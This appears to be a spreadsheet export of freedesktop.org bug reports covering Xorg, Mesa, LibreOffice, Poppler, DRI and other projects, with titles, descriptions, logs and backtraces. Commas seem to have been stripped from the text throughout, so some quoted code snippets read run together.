  <si>
    <t>[PATCH] Undo incompatible us(dvp) Programmer Dvorak layout additions</t>
  </si>
  <si>
    <t>Created attachment 117485
Patch to remove incompatible parts of bf3990
Commit bf3990 requested in issue
  https://bugs.freedesktop.org/show_bug.cgi?id=71457
adds mapping for five fourth-level keys to Unicode characters. However
two of these are incompatible with upstream. These mappings should be
removed to avoid fragmentation of the layout across platforms.
The other three assignments are kept without prejudice.</t>
  </si>
  <si>
    <t>rlndkfmn+freedesktop</t>
  </si>
  <si>
    <t>XORG-13437</t>
  </si>
  <si>
    <t>EXA displays incompletely rendered text as opposed to XAA w/ radeon driver</t>
  </si>
  <si>
    <t>hi there 
The text that is rendered with the EXA is incomplete as characters are missing pieces as the screenshots will show.  This happens when using the radeon driver.</t>
  </si>
  <si>
    <t>cheryl</t>
  </si>
  <si>
    <t>DRI-79894</t>
  </si>
  <si>
    <t>[regression] Ubuntu 14.04 and a black screen after an update</t>
  </si>
  <si>
    <t>Hello
Ubuntu 14.04 worked very well until I made an update. Now I have a black screen. I tried all the solutions I found on the Web. No results. I tried the recovery. No results. I tried to reinstall Ubuntu but the screen stay dark and I can't do nothing. If I understand well the update installed a new graphic pilot and I can not see anymore what's behind the black screen. Do someone can help me? I have an Asus K50Ij with a graphic card IntelÂ® GMA 4500M.
Thank you so much
TG.</t>
  </si>
  <si>
    <t>thibault_g</t>
  </si>
  <si>
    <t>XORG-70803</t>
  </si>
  <si>
    <t>libX11-1.6.1/src/xcms/cmsColNm.c:317: possible bad if test ?</t>
  </si>
  <si>
    <t>I just compiled X11 on Linux with the extra compiler flag -Wlogical-op
It said
cmsColNm.c:317:2: warning: logical 'or' of collectively exhaustive tests is always true [-Wlogical-op]
Source code is 
    if ((*pBuf != '\n') || (*pBuf != '\0')) {
Suggest replace || with &amp;&amp;</t>
  </si>
  <si>
    <t>LIBREOFFICE-57033</t>
  </si>
  <si>
    <t>FILEOPEN: cannot go back to open calc files (or writer files)...</t>
  </si>
  <si>
    <t>Problem description: 
in ubuntu oneiric when i open calc and move to another application (say firefox browser) i cannot go back to the open calc file.  To get to it i have to open a new calc file and then switch to the first open file via the window menu choice...  it's been months like this...  :(
Steps to reproduce:
1. ....
2. ....
3. ....
Current behavior:
Expected behavior:
Platform (if different from the browser): 
Browser: Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/536.11 (KHTML like Gecko) Ubuntu/12.04 Chromium/20.0.1132.47 Chrome/20.0.1132.47 Safari/536.11
sdsds</t>
  </si>
  <si>
    <t>marcdunord</t>
  </si>
  <si>
    <t>MESA-7178</t>
  </si>
  <si>
    <t>Mesa 1.5  i810 1.6.0 and xorg-server 1.1.0 crash for any GLX app</t>
  </si>
  <si>
    <t>Mesa 1.5 i810 1.6.0 and xorg-server 1.1.0 crash for any GLX app includeing
simple things like glxinfo and glxgears.
I have a i915 card. Anything else I can provide that would help?</t>
  </si>
  <si>
    <t>haplo</t>
  </si>
  <si>
    <t>XORG-37174</t>
  </si>
  <si>
    <t>Missing -novtswitch option</t>
  </si>
  <si>
    <t>Under FreeBSD (or kFreeBSD for that matter) there is like with Linux some code to switch back to the VT from which the X server was launched. Itâ€™s at hw/xfree86/os-support/bsd/bsd_init.c:683:
	if (initialVT != -1)
		ioctl(xf86Info.consoleFd VT_ACTIVATE initialVT)
This code is useful when you start X from a console but it becomes obnoxious when run from a display manager causing unwanted and uncontrolled VT switches when you change users.
Under Linux it can be disabled using the -novtswitch option but it is not implemented with FreeBSD. It would be nice to be able to rely on a sane VT switching behavior on FreeBSD too (and I guess that would fix the other BSDs as well).</t>
  </si>
  <si>
    <t>DRI-28164</t>
  </si>
  <si>
    <t>[KMS] No LVDS native mode available after using VGA-0</t>
  </si>
  <si>
    <t>It's RV620 drm-radeon-testing.
Today I performed:
xrandr --output VGA-0 --mode 1024x768
xrandr --output LVDS --mode 1024x768
xrandr --output VGA-0 --off
I couldn't set my LVDS to it's native 1600x900 anymore. It was not available in xrandr.
Could this be duplicate on radeonhd bug #22093?
What drm.debug value can I set to debug this issue?</t>
  </si>
  <si>
    <t>LIBREOFFICE-57183</t>
  </si>
  <si>
    <t>: Top Bar (File/Edit/View/Insert etc) randomly disappears</t>
  </si>
  <si>
    <t>Problem description: 
Steps to reproduce:  unknown
Current behavior:
File Edit View Insert Format Tools Data Window Help is missing from top bar of window.  This seems to happen randomly but fairly frequently.  I will be editing a spreadsheet nothing fancy and I'll go for the top bar to (for instance) insert or delete a row and the content is not there.  Started with Ubuntu 12.10 upgrade which I did on the first day of availability.  I would get you a screen shot but it's not happening at the moment...  I'll wait a while and play and see if I can coax it to happen again.  Nope...
Expected behavior:
File Edit View Insert Format Tools Data Window Help should appear on top bar of window
Platform (if different from the browser): Ubuntu 12.10
Browser: Mozilla/5.0 (X11 Ubuntu Linux i686 rv:16.0) Gecko/20100101 Firefox/16.0</t>
  </si>
  <si>
    <t>jervin</t>
  </si>
  <si>
    <t>MESA-110373</t>
  </si>
  <si>
    <t>[regression][bisected] Piglit deqp gl{es} cts shader failures</t>
  </si>
  <si>
    <t>The full list of 246 test failures on i965 and Iris can be found here along with test stdout/stderr:
https://mesa-ci.01.org/mesa_master/builds/15928/group/63a9f0ea7bb98050796b649e85481845#fails
This has been bisected to:
commit b7ca074cc0df6101c428b2dfa53a59a0c6620af2
Author: Marek OlÅ¡Ã¡k 
Date:   Mon Apr 8 17:20:13 2019 -0400
    glsl: fix shader_storage_blocks_write_access for SSBO block arrays</t>
  </si>
  <si>
    <t>POPPLER-37189</t>
  </si>
  <si>
    <t>patch to fix a bad memory access when a character starts to the left of the image</t>
  </si>
  <si>
    <t>Created attachment 46698
Sample file to show the problem
When Splash::fillGlyph2() draws a character if the starting X location is negative it increments the pointer to the glyph data to start at the position in the glyph data that should go at X position 0.
If glyph-&gt;aa is set the glyph data is one byte per pixel and the increment by abs(x start) is correct.
If glyph-&gt;aa is not set the glyph data is one byte per 8 pixels and the increment should be by abs(x start)/8 and the loop that scans the data should be offset by abs(x start)%8.
Splash::fillGlyph2() currently adds the same increment of abs(x start) whether or not glyph-&gt;aa is set and when glyph-&gt;aa is not set drawing a character with a negative X position can cause a bad memory reference.  For example running
  pdftops -eps -level1sep testimagemask.pdf test.ps
under valgrind reports
==12606== Conditional jump or move depends on uninitialised value(s)
==12606==    at 0x8120237: Splash::fillGlyph2(int int SplashGlyphBitmap* bool) (Splash.cc:1856)
==12606==    by 0x811FA58: Splash::fillChar(double double int SplashFont*) (Splash.cc:1724)</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-106815</t>
  </si>
  <si>
    <t>FDO new account and drm/i915 commit rights for Michel Thierry</t>
  </si>
  <si>
    <t>Created attachment 140019
SSH pub key
name: Michel Thierry
email address: michel.thierry@intel.com
preferred account name: mthierry</t>
  </si>
  <si>
    <t>michel.thierry</t>
  </si>
  <si>
    <t>FONTCONFIG-10899</t>
  </si>
  <si>
    <t>There is no U+1257</t>
  </si>
  <si>
    <t>There is no such character as U+1257 but ti_er.orth thinks there is.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-34736</t>
  </si>
  <si>
    <t>Merge OLPC mn keyboard map updates</t>
  </si>
  <si>
    <t>This patch applies to the tip of today's head
http://dev.laptop.org/git/users/martin/xkeyboard-config/commit/?id=a1a9fc6a2505f3bb54f3d65966557d920c313ebd</t>
  </si>
  <si>
    <t>MESA-89372</t>
  </si>
  <si>
    <t>[softpipe] piglit glsl-1.50 generate-zero-primitives regression</t>
  </si>
  <si>
    <t>mesa: d528907fd2950c7bb968fff66dd79863cd128890 (master 10.6.0-devel)
$ ./bin/shader_runner tests/spec/glsl-1.50/execution/geometry/generate-zero-primitives.shader_test -auto 
Floating point exception (core dumped)
Core was generated by `./bin/shader_runner tests/spec/glsl-1.50/execution/geometry/generate-zero-primi'.
Program terminated with signal SIGFPE Arithmetic exception.
#0  0x00007fe007e6b16f in draw_pt_emit_prepare (emit=0x1d48600 
    prim=prim@entry=0 max_vertices=max_vertices@entry=0x1dfdf88)
    at draw/draw_pt_emit.c:116
116	   *max_vertices = (draw-&gt;render-&gt;max_vertex_buffer_bytes /
(gdb) l
111	       translate_key_compare(&amp;emit-&gt;translate-&gt;key &amp;hw_key) != 0) {
112	      translate_key_sanitize(
113	      emit-&gt;translate = translate_cache_find(emit-&gt;cache 
114	   }
115	
116	   *max_vertices = (draw-&gt;render-&gt;max_vertex_buffer_bytes /
117	                    (vinfo-&gt;size * 4))
118	}
119	
120	
(gdb) print emit-&gt;translate-&gt;key
$1 = {output_stride = 0 nr_elements = 0 element = {{
      type = TRANSLATE_ELEMENT_NORMAL input_format = PIPE_FORMAT_NONE 
      output_format = PIPE_FORMAT_NONE input_buffer = 0 input_offset = 0 
      instance_divisor = 0 output_offset = 0} }}
(gdb) print hw_key
$2 = {output_stride = 0 nr_elements = 0 element = {{
      type = TRANSLATE_ELEMENT_NORMAL input_format = PIPE_FORMAT_NONE 
      output_format = PIPE_FORMAT_NONE input_buffer = 0 input_offset = 0 
      instance_divisor = 0 output_offset = 0} }}</t>
  </si>
  <si>
    <t>MESA-57044</t>
  </si>
  <si>
    <t>build failure: make[4]: *** No rule to make target `../../src/mesa/program/libprogram.la' needed by `libmesagallium.la'.  Stop.</t>
  </si>
  <si>
    <t>907844107252260c646aca361191ef7f121f3d23 is the first bad commit - git bisect run
automakeandroid: Build program/ into a helper lib (v2)
Using my build test script which starts by deleting the install prefix and running git clean -xfd on all the repos.
Built with:  ./autogen.sh --prefix=$WLD --enable-gles2 --disable-gallium-egl --with-egl-platforms=waylandx11drm --enable-gbm --enable-shared-glapi --wi
th-gallium-drivers=r300r600swrastnouveausvga
Problem also exists in the latest commit:  6991c2922f530d88622900039c24bd04d9c15ce7</t>
  </si>
  <si>
    <t>LIBREOFFICE-49342</t>
  </si>
  <si>
    <t>CRASH EDITING TABLE when merge cells in .sxw</t>
  </si>
  <si>
    <t>1. File in sxw format containing table with some merged cells and SUM cells also saved as odt format (see attachments).
2. The 2 cells that are important for me to merge are highlighted in red but in fact the crash happens with any other cells in this file (both the original and the saved as version).
3. This is a bug serious enough for me as the merger IS IMPOSSIBLE so in effect I have to make the table over again: not something to look forward to especially that I've got a few of those old format files to work on.
4. Perhaps this bug will help resolve the other (reported) crash-bug which is trying to merge cells in table pasted from spreadsheet as rtf.
OS: Open SUSE 12.1</t>
  </si>
  <si>
    <t>Maciej_Powalowski</t>
  </si>
  <si>
    <t>DBUS-12862</t>
  </si>
  <si>
    <t>[patch] use ssize_t instead of size_t for read(2) return value</t>
  </si>
  <si>
    <t>size_t is unsigned but read(2) returns a signed value. This causes that the following if conditions are always false. Attaching a patch.</t>
  </si>
  <si>
    <t>LIBREOFFICE-68291</t>
  </si>
  <si>
    <t>EDITING:[Regression] Page Break is Inserted Unintentionally</t>
  </si>
  <si>
    <t>Problem description: 
Under specific conditions a page break is inserted incorrectly into a text document.
Steps to reproduce:
[1] Create a new text document.
[2] Display non-printing characters.
[3] Insert 3 paragraphs with just one word.
[4] Insert another paragraph without text with â€œEnterâ€.
[5] Select first word with double-click.
[6] Copy to clipboard: Ctrl+C.
[7] Move cursor to last line.
[8] Paste clipboard as formatted text: Edit â†’ Paste Special... â†’ Formatted text [RTF] â†’ OK: The word plus an end paragraph character is inserted. Expected: Only the word without the end paragraph character should be inserted.
[9] Select first word again with double-click.
[10] Copy to clipboard: Ctrl+C.
[11] Move cursor to last line.
[12] Insert clipboard with Ctrl+V: A page break and the word is inserted. Expected: only the word should be inserted.
Problem of step [8] exists in all versions from 3.5.0 to 4.1.0. Probably also before I did not test it.
Problem of step [12] occurs first in version 4.0.0.
Operating System: Windows 7
Version: 4.1.0.4 release
Last worked in: 3.6.7.2 rc</t>
  </si>
  <si>
    <t>harald.koester</t>
  </si>
  <si>
    <t>XORG-62618</t>
  </si>
  <si>
    <t>Text missing in menu bar of java/awt applications [SNA]</t>
  </si>
  <si>
    <t>There seems to be a long standing bug in SNA which causes text rendering in java/awt applications to be unreliable.
Steps to reproduce:
- Make sure you have java installed
- Start the policytool program
- Play with the menu-bar
I've created a screencast to illustrate the issue: http://youtu.be/1oWPHiT7cYU
Intel 2.21.5 release Sandy Bridge notebook
This bug only seems to happen when no composition manager is used.</t>
  </si>
  <si>
    <t>XORG-8871</t>
  </si>
  <si>
    <t>epiphany doesn't render properly when composite manager is running</t>
  </si>
  <si>
    <t>with the metacity compositor running run epiphany and open this page:
http://developer.gnome.org/doc/API/2.0/glib/index.html
now scroll-down the page and then scroll-up. The top header Glib Reference
Manual is rendered a lot of times occupying the html page space.</t>
  </si>
  <si>
    <t>cerdiogenes</t>
  </si>
  <si>
    <t>DRI-59672</t>
  </si>
  <si>
    <t>Problems initializing Radeon driver: lockup during IB test</t>
  </si>
  <si>
    <t>Created attachment 73396
modprobe radeon with drm.debug=1
Hi all
I've been trying to get a evergreen adapter to work with the Radeon driver on a ppc64 machine. And while attempting that I'm running into what seems to be a infinite loop while running the IB test on ring 3.
I'm using a 3.8.0-rc4 kernel from today.
Follows an excerpt from the logs the entire modprobe log can be found attached.
[  171.975487] [drm:evergreen_blit_init] evergreen blit allocated bo 00000600 vs 00000400 ps 00000500
[  171.975631] radeon 0001:01:00.0: WB enabled
[  171.975636] radeon 0001:01:00.0: fence driver on ring 0 use gpu addr 0x0000000020000c00 and cpu addr 0xc0000001d32b0c00
[  171.975642] radeon 0001:01:00.0: fence driver on ring 3 use gpu addr 0x0000000020000c0c and cpu addr 0xc0000001d32b0c0c
[  171.992732] [drm] ring test on 0 succeeded in 0 usecs
[  171.992799] [drm] ring test on 3 succeeded in 1 usecs
[  171.993112] [drm:evergreen_irq_set] evergreen_irq_set: sw int gfx
[  171.993154] [drm] ib test on ring 0 succeeded in 0 usecs
[  171.993197] [drm:evergreen_irq_set] r600_irq_set: sw int dma
[  172.419617] [drm:evergreen_irq_set] r600_irq_set: sw int dma
....
[  182.399612] [drm:evergreen_irq_set] r600_irq_set: sw int dma
[  182.409618] [drm:evergreen_irq_set] r600_irq_set: sw int dma
[  182.419604] radeon 0001:01:00.0: GPU lockup CP stall for more than 10000msec
[  182.419615] radeon 0001:01:00.0: GPU lockup (waiting for 0x0000000000000001 last fence id 0x0000000000000000)
[  182.419626] [drm:r600_dma_ib_test] *ERROR* radeon: fence wait failed (-35).
[  182.419634] [drm:radeon_ib_ring_tests] *ERROR* radeon: failed testing IB on ring 3 (-35).
Do you guys have any idea what could be wrong or what should be looked into? 
Thanks</t>
  </si>
  <si>
    <t>lucaskt</t>
  </si>
  <si>
    <t>LIBREOFFICE-49683</t>
  </si>
  <si>
    <t>FILEOPEN property Keyword (File&gt;Properties ..&gt; Description) no longer imported in rtf document</t>
  </si>
  <si>
    <t>Created attachment 61276
test file with proterty Keyword
attached file from old version but saved in 3.4.x has a property keyword (value bhavb)
Opening the file in 3.5.x the field Keyword is empty</t>
  </si>
  <si>
    <t>LIBREOFFICE-55381</t>
  </si>
  <si>
    <t>LibreOffice does not recognize page breaks in attached docx</t>
  </si>
  <si>
    <t>Created attachment 67760
bugdoc
The user produced this docx with Abby FineReader from a PDF. The resulting document opens fine in Word but in LibreOffice Writer all text boxes are on the first page they are overlapping each other.</t>
  </si>
  <si>
    <t>MESA-29489</t>
  </si>
  <si>
    <t>[glsl2] piglit test preprocess-01.frag fails</t>
  </si>
  <si>
    <t>As reported by Thomas Jones shaders such as the one below now in piglit test case preprocess-01.frag do not compile:
#ifdef FOO
#if FOO == 4
#elif SAMP == 5
#endif
#endif
void main()  { gl_FragData[0] = vec4(0)}</t>
  </si>
  <si>
    <t>POPPLER-58293</t>
  </si>
  <si>
    <t>Cannot open the provided PDF with evince but Apple Mac Preview opens it easily</t>
  </si>
  <si>
    <t>Cannot open the provided PDF with evince but Apple Mac Preview opens it easily.
Here's the link:
http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.17.7459&amp;rep=rep1&amp;type=pdf</t>
  </si>
  <si>
    <t>freedesktop-bugzilla</t>
  </si>
  <si>
    <t>SYNCEVOLUTION-52882</t>
  </si>
  <si>
    <t>D-Bus server: TestDBusServerPresence.testPresenceSignal</t>
  </si>
  <si>
    <t xml:space="preserve">
---- Reported by patrick.ohly@intel.com 2011-07-20 14:24:07 +0000 ----
From nightly testing shortly after 1.1.99.5:
TestDBusServerPresence.testPresenceSignal - check Server.Presence signal ... ERROR:dbus.connection:Exception in handler for D-Bus signal:
Traceback (most recent call last):
  File /usr/lib/pymodules/python2.6/dbus/connection.py line 214 in maybe_handle_message
    self._handler(*args **kwargs)
  File /work/runtests/head/syncevolution/test/test-dbus.py line 973 in cb_bt_presence
    obex-bt://temp-bluetooth-peer-changed-from-http)
  File /usr/lib/python2.6/unittest.py line 350 in failUnlessEqual
    (msg or '%r != %r' % (first second))
AssertionError: dbus.UTF8String('http://http-only-1') != 'obex-bt://temp-bluetooth-peer-changed-from-http'
ok
The test needs to be fixed it shouldn't test assertions inside the callback because the D-Bus layer swallows these exceptions. Found after adding -u to the python invocation (disabled buffering of stdout).
---- Additional Comments From patrick.ohly@intel.com 2012-01-12 10:06:05 +0000 ----
Fixed as part of BMC #24587. Commit will go into 1.2.2 and 1.3.
--- Bug imported by patrick.ohly@gmx.de 2012-07-29 20:36 UTC  ---
This bug was previously known as _bug_ 21541 at https://bugs.meego.com/show_bug.cgi?id=21541
</t>
  </si>
  <si>
    <t>CAIRO-6617</t>
  </si>
  <si>
    <t>With cairo 1.0.4 when drawing bitmapped text to xlib backend text after the first space does not appear</t>
  </si>
  <si>
    <t>I'm using sylpheed-claws e-mail client.
Since I upgraded from cairo 1.0.2 to 1.0.4 when i click on a message the text
disappears only the first word remains visible.
It only happens with some fonts like artwiz(snap nu...) and matto &lt; size 11.
Here are some shots:
Before clicking on a message:
http://www.flickr.com/photos/21421799@N00/129179052/
After:
http://www.flickr.com/photos/21421799@N00/129179054/
When i move the scrollbar up and down the text reappears.</t>
  </si>
  <si>
    <t>ld.fifty</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-8728</t>
  </si>
  <si>
    <t>new Dvorak french layout</t>
  </si>
  <si>
    <t>Hello
  An improved version of current french Dvorak layout is going to be set up by
community of users (on http://gpl.insa-lyon.fr/Dvorak-Fr/) and we'd like to
include it in Xorg. You'll find in attachment a preliminary patch as we aren't
ready at now. One of our main concern is how to handle old (obsolete) dvorak
layout (from J.Mouette) and how to name our improved one.
  A version of this layout also exists for Typematrix 2030 keyboard (see
http://gpl.insa-lyon.fr/Dvorak-Fr/XKB6%2e2%2e1%2e1) but I didn't include it in
the patch as I don't know how to handle it.
  Could you please evaluate this patch I'll take account of your remarks for
the real one ?
  Thanks
    FrÃ©dÃ©ric.</t>
  </si>
  <si>
    <t>fboiteux</t>
  </si>
  <si>
    <t>HAL-15482</t>
  </si>
  <si>
    <t>HAL shows battery twice on PMU</t>
  </si>
  <si>
    <t>HAL-0.5.10 and 0.5.11rc2 both show the battery of my iBook G4 twice in kpowersave. I compiled HAL with PMU support and disabled all APM stuff (emulation) in the kernel (2.6.24). I also installed the latest version of hal-info but that didn't change it either.
Here is the output of lshal | grep battery:
udi = '/org/freedesktop/Hal/devices/pmu_battery_0_0'
  battery.charge_level.current = 1938  (0x792)  (int)
  battery.charge_level.design = 4316  (0x10dc)  (int)
  battery.charge_level.last_full = 4316  (0x10dc)  (int)
  battery.charge_level.percentage = 44  (0x2c)  (int)
  battery.charge_level.rate = 1980  (0x7bc)  (int)
  battery.is_rechargeable = true  (bool)
  battery.present = true  (bool)
  battery.rechargeable.is_charging = true  (bool)
  battery.rechargeable.is_discharging = false  (bool)
  battery.remaining_time = 4323  (0x10e3)  (int)
  battery.technology = 'unknown'  (string)
  battery.type = 'primary'  (string)
  info.capabilities = {'battery'} (string list)
  info.category = 'battery'  (string)
  info.udi = '/org/freedesktop/Hal/devices/pmu_battery_0_0'  (string)
  linux.pmu_path = '/proc/pmu/battery_0'  (string)
  linux.sysfs_path = '/sys/devices/platform/pmu-battery.0/power_supply/pmu-ac'  (string)
udi = '/org/freedesktop/Hal/devices/computer_power_supply_battery_PMU_battery_0'
  battery.charge_level.current = 1930  (0x78a)  (int)
  battery.charge_level.design = 0  (0x0)  (int)
  battery.charge_level.last_full = 4316  (0x10dc)  (int)
  battery.charge_level.percentage = 44  (0x2c)  (int)
  battery.charge_level.rate = 1980  (0x7bc)  (int)
  battery.is_rechargeable = true  (bool)
  battery.model = 'Smart'  (string)
  battery.present = true  (bool)
  battery.rechargeable.is_charging = true  (bool)
  battery.rechargeable.is_discharging = false  (bool)
  battery.remaining_time = 4338  (0x10f2)  (int)
  battery.reporting.current = 1930  (0x78a)  (int)
  battery.reporting.last_full = 4316  (0x10dc)  (int)
  battery.reporting.rate = 1980  (0x7bc)  (int)
  battery.reporting.unit = 'mWh'  (string)
  battery.technology = 'unknown'  (string)
  battery.type = 'primary'  (string)
  battery.voltage.current = 11791  (0x2e0f)  (int)
  info.capabilities = {'battery'} (string list)
  info.category = 'battery'  (string)
  info.udi = '/org/freedesktop/Hal/devices/computer_power_supply_battery_PMU_battery_0'  (string)
  linux.sysfs_path = '/sys/devices/platform/pmu-battery.0/power_supply/PMU battery 0'  (string)
udi = '/org/freedesktop/Hal/devices/platform_pmu_battery_0'
  info.product = 'Platform Device (pmu-battery.0)'  (string)
  info.udi = '/org/freedesktop/Hal/devices/platform_pmu_battery_0'  (string)
  linux.sysfs_path = '/sys/devices/platform/pmu-battery.0'  (string)
  platform.id = 'pmu-battery.0'  (string)</t>
  </si>
  <si>
    <t>chrschmitt</t>
  </si>
  <si>
    <t>XORG-16551</t>
  </si>
  <si>
    <t>unbalanced paren in expansion of XkbGetIndicatorMapChanges</t>
  </si>
  <si>
    <t>In the expansion of the preprocessor macro XkbGetIndicatorMapChanges
in  XKBlib.h at line 533 the opening prenthesis is not closed.
------ context -------- (... for omissions)
/* $Xorg: XKBlib.hv 1.6 2000/08/17 19:45:03 cpqbld Exp $ */
/************************************************************
Copyright (c) 1993 by Silicon Graphics Computer Systems Inc.
...
********************************************************/
/* $XFree86: xc/lib/X11/XKBlib.hv 3.5 2003/04/17 02:06:31 dawes Exp $ */
#ifndef _XKBLIB_H_
#define _XKBLIB_H_
...
#define	XkbNoteIndicatorStateChanges(onw)\
				((o)-&gt;state_changes|=((n)-&gt;state_changes&amp;(w)))
#define	XkbGetIndicatorMapChanges(dxc) \
				(XkbGetIndicatorMap((d)(c)-&gt;map_changesx)
#define	XkbChangeIndicatorMaps(dxc) \
				(XkbSetIndicatorMap((d)(c)-&gt;map_changesx))
...
#endif /* _XKBLIB_H_ */</t>
  </si>
  <si>
    <t>antalk</t>
  </si>
  <si>
    <t>LIBREOFFICE-42436</t>
  </si>
  <si>
    <t>Text Box don't show on header</t>
  </si>
  <si>
    <t>Created attachment 52956
Docx file
If you create a docx file with a Text Box on header this don't show on Writer.
If the file is .doc the height of the header is less than given in Word.
I use Libreoffice portable 3.4.3.</t>
  </si>
  <si>
    <t>almorca</t>
  </si>
  <si>
    <t>LIBREOFFICE-66318</t>
  </si>
  <si>
    <t>Can't auto resize big image when add it to Writer.</t>
  </si>
  <si>
    <t>When we copy a big image into Writer it can't auto resize the image(wider than the writing field) to a smaller and fit size. There even have no way to resize the image!
I don't know whether the newest version of libreoffice fixed this problem or not.</t>
  </si>
  <si>
    <t>huzheng001</t>
  </si>
  <si>
    <t>XORG-1353</t>
  </si>
  <si>
    <t>[Intel/i830] Error in I830WaitLpRing().  Server lockup</t>
  </si>
  <si>
    <t>When I leave my work machine run overnight the screen is black and everything
is locked up.  The keyboard is unresponsive and the log has this:
Error in I830WaitLpRing() now is 3544 start is 1543
pgetbl_ctl: 0x17f60001 pgetbl_err: 0x49
ipeir: 0 iphdr: 7f1400cf
LP ring tail: 30 head: 0 len: 1f001 start 0
eir: 0 esr: 10 emr: ff7b
instdone: 68c1 instpm: 0
memmode: 0 instps: 53
hwstam: ffff ier: 0 imr: ffff iir: 0
space: 131016 wanted 131064
Fatal server error:
lockup
Please consult the The X.Org Foundation support
         at http://wiki.X.Org
 for help.
Please also check the log file at /var/log/Xorg.0.log for additional information.
Error in I830WaitLpRing() now is 6547 start is 4546
pgetbl_ctl: 0x17f60001 pgetbl_err: 0x49
ipeir: 0 iphdr: 7f1400cf
LP ring tail: 38 head: 0 len: 1f001 start 0
eir: 0 esr: 10 emr: ff7b
instdone: 68c1 instpm: 0
memmode: 0 instps: 53
hwstam: ffff ier: 0 imr: ffff iir: 0
space: 131008 wanted 131064
FatalError re-entered aborting
lockup
I found a thread that has a possible fix for this issue in an old Xfree86
discussion:
http://www.mail-archive.com/xfree86@xfree86.org/msg10075.html
However I didn't find any similar code on my Fedora2 machine yet.</t>
  </si>
  <si>
    <t>DRI-87733</t>
  </si>
  <si>
    <t>[BDW/BSW]igt/gem_pwrite_pread sporadically causes *ERROR* Hangcheck timer elapsed... blitter ring idle</t>
  </si>
  <si>
    <t>Created attachment 111354
dmesg
==System Environment==
--------------------------
Regression: not sure
on-working platforms: BSW
==kernel==
--------------------------
drm-intel-next-queued/140fd38dc4962ae3694f81900b51c567df1b6d33
==Bug detailed description==
-----------------------------
It sporadically causes [  118.756567] [drm:i915_hangcheck_elapsed [i915]] *ERROR* Hangcheck timer elapsed... blitter ring idle. Fail rate: 1/5
output:
IGT-Version: 1.9-geb799b2 (x86_64) (Linux: 3.18.0-rc7_drm-intel-next-queued_140fd3_20141226+ x86_64)
** mmap snooped copy 16384 bytes x      1:      418.000Ã‚Âµs 39.2MiB/s
** mmap snooped copy 16384 bytes x      2:      181.500Ã‚Âµs 90.3MiB/s
** mmap snooped copy 16384 bytes x      4:      117.250Ã‚Âµs 139.7MiB/s
** mmap snooped copy 16384 bytes x      8:       85.000Ã‚Âµs 192.8MiB/s
** mmap snooped copy 16384 bytes x     16:       90.688Ã‚Âµs 180.7MiB/s
** mmap snooped copy 16384 bytes x     32:       84.469Ã‚Âµs 194.0MiB/s
** mmap snooped copy 16384 bytes x     64:       84.125Ã‚Âµs 194.8MiB/s
** mmap snooped copy 16384 bytes x    128:       86.250Ã‚Âµs 190.0MiB/s
** mmap snooped copy 16384 bytes x    256:       85.594Ã‚Âµs 191.4MiB/s
** mmap snooped copy 16384 bytes x    512:       83.424Ã‚Âµs 196.4MiB/s
** mmap snooped copy 16384 bytes x   1024:       84.175Ã‚Âµs 194.6MiB/s
** mmap snooped copy 16384 bytes x   2048:       85.220Ã‚Âµs 192.3MiB/s
** mmap snooped copy 16384 bytes x   4096:       78.558Ã‚Âµs 208.6MiB/s
** mmap snooped copy 16384 bytes x   8192:       89.401Ã‚Âµs 183.3MiB/s
** mmap snooped copy 16384 bytes x  16384:       83.158Ã‚Âµs 197.0MiB/s
** mmap snooped copy 16384 bytes x  32768:       81.299Ã‚Âµs 201.5MiB/s
** mmap snooped copy 16384 bytes x  65536:       76.108Ã‚Âµs 215.3MiB/s
** mmap snooped copy 16384 bytes x 131072:      100.904Ã‚Âµs 162.4MiB/s
Subtest snooped-pwrite-blt-cpu_mmap-performance: SUCCESS (23.644s)
==Reproduce steps==
---------------------------- 
1. ./gem_pwrite_pread --run-subtest snooped-pwrite-blt-cpu_mmap-performance</t>
  </si>
  <si>
    <t>XDG-APP-95288</t>
  </si>
  <si>
    <t>freedesktop-sdk-base [cross-localedef-native]: Use fresh build scripts and build on aarch64</t>
  </si>
  <si>
    <t>Created attachment 123512
Patch to use autotools default configure in the localedef directory
This adds an override cross-localedef-native_2.22.bbappend override
which leverages the oe autotools configure ultimately so that
it will use a fresh config.sub &amp; config.guess and properly recognize
the aarch64 machine.
This is a backport of an upstream yocto bug filed with this report
and patch mail:
  https://bugzilla.yoctoproject.org/show_bug.cgi?id=9508
  http://lists.openembedded.org/pipermail/openembedded-core/2016-April/120613.html
This should be removed if/when the upstream bug is fixed in jethro or when
moving to a new poky release branch which uses a newer version of glibc.</t>
  </si>
  <si>
    <t>MESA-38625</t>
  </si>
  <si>
    <t>ast_to_hir.cpp:1761: const glsl_type* process_array_type(YYLTYPE* const glsl_type* ast_node* _mesa_glsl_parse_state*): Assertion `dummy_instructions.is_empty()' failed.</t>
  </si>
  <si>
    <t>mesa: 9c5d15e929f47f517f90977f5420e11dfbd3db67 (master)
Run piglt glsl-1.20 compiler structure-and-array-operations array-size-constant-relational test on swrast or softpipe.
$ ./bin/glslparsertest tests/spec/glsl-1.20/compiler/structure-and-array-operations/array-size-constant-relational.vert pass 1.20
glslparsertest: ast_to_hir.cpp:1761: const glsl_type* process_array_type(YYLTYPE* const glsl_type* ast_node* _mesa_glsl_parse_state*): Assertion `dummy_instructions.is_empty()' failed.
(gdb) bt
#0  0x00815416 in __kernel_vsyscall ()
#1  0x00b2f941 in raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#2  0x00b32e42 in abort () at abort.c:92
#3  0x00b288e8 in __assert_fail (assertion=0x6423e8 dummy_instructions.is_empty() file=0x641956 ast_to_hir.cpp line=1761 
    function=0x643840 const glsl_type* process_array_type(YYLTYPE* const glsl_type* ast_node* _mesa_glsl_parse_state*)) at assert.c:81
#4  0x004f3829 in process_array_type (loc=0xbfc8b2b8 base=0x714ac0 array_size=0x91c6998 state=0x91c1f68) at ast_to_hir.cpp:1761
#5  0x004f3a00 in ast_type_specifier::glsl_type (this=0x91c6610 name=0xbfc8b370 state=0x91c1f68) at ast_to_hir.cpp:1805
#6  0x004f4d53 in ast_declarator_list::hir (this=0x91c6a78 instructions=0x8eb3230 state=0x91c1f68) at ast_to_hir.cpp:2390
#7  0x004eeed7 in _mesa_ast_to_hir (instructions=0x8eb3230 state=0x91c1f68) at ast_to_hir.cpp:85
